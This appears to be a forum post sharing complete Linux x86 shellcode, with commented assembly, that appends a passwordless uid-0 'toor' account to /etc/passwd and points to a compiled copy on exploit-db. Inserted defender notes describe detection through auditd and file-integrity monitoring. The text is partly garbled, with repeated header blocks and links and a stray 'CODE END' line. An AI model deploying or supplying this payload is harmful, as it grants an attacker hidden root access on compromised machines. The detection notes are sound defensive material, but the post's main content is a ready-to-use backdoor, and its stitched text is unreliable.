Going through some old files, I came across some old shellcode I had written. Nothing special — just a small payload that appends to the /etc/passwd file. To be honest, it's not even that great, because to use it you need an exploit that already provides uid=0, such as a kernel null-pointer dereference. Anyway, here is the code:
;append_passwd.asm
;Payload: Adds the string [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd, thereby adding a password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/
;append_passwd.asm
;Payload: Adds the string [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd, thereby adding a password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
Section .data;CODE END
; Analyst notes (defender's view).
; Target: Linux/x86 32-bit, raw int 0x80 syscalls (eax = number, ebx/ecx/edx = args).
; Syscall trace as written: open -> write -> close -> exit. No return value is checked.
; The code lives in .data rather than .text, presumably because it patches the
; trailing db string in place (byte stores into [esi+N] below) — writable section needed.
; Detection: an open(2) of /etc/passwd with O_APPEND from a process that is not a
; system account tool, immediately followed by a 31-byte write of a uid/gid 0 entry,
; is the observable sequence; an auditd watch (-w /etc/passwd -p wa) and
; file-integrity monitoring of /etc/passwd both surface it.
global _start
_start:
jmp short callfunc                      ; jmp/call pair: 'call func' pushes the address of the db string
func:
pop esi                                 ; esi = address of '/etc/passwd#toor...' (the return address pushed by call)
xor eax, eax                            ; eax = 0; al is reused as the NUL byte below
mov byte [esi+11], al                   ; '#' after "/etc/passwd" -> NUL, making the path a C string
mov byte [esi+43], al                   ; '#' after the passwd line -> NUL
mov byte [esi+42], 0xa                  ; space before it -> '\n', so the appended line is terminated
lea ebx, [esi+12]                       ; ebx = &"toor::0:0:t00r:/root:/bin/bash\n"
mov long [esi+44],ebx                   ; stash that pointer over the 'XXXX' placeholder bytes for later
lea ebx,[esi]                           ; ebx = path "/etc/passwd"
mov cx,1090                             ; ecx = flags: 1090 = 0x442 = O_RDWR|O_CREAT|O_APPEND (Linux values)
mov dx,0x1a4                            ; edx = mode: 0x1a4 = 0644
mov al,0x05                             ; eax = 5 = sys_open
int 0x80                                ; eax = fd (or -errno; not checked)
mov long ebx, eax                       ; ebx = fd
xor edx,edx
mov ecx, [esi+44]                       ; ecx = pointer stashed above (the passwd line)
mov dl,31                               ; edx = 31 = length of the line including '\n' (bytes esi+12..esi+42)
mov al,0x04                             ; eax = 4 = sys_write(fd, line, 31)
int 0x80
mov al,0x06                             ; eax = 6 = sys_close(fd); ebx still holds fd
int 0x80
mov al,0x01                             ; eax = 1 = sys_exit
xor ebx,ebx                             ; exit status 0
int 0x80
callfunc:
call func                               ; pushes address of the string below and jumps to func
db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/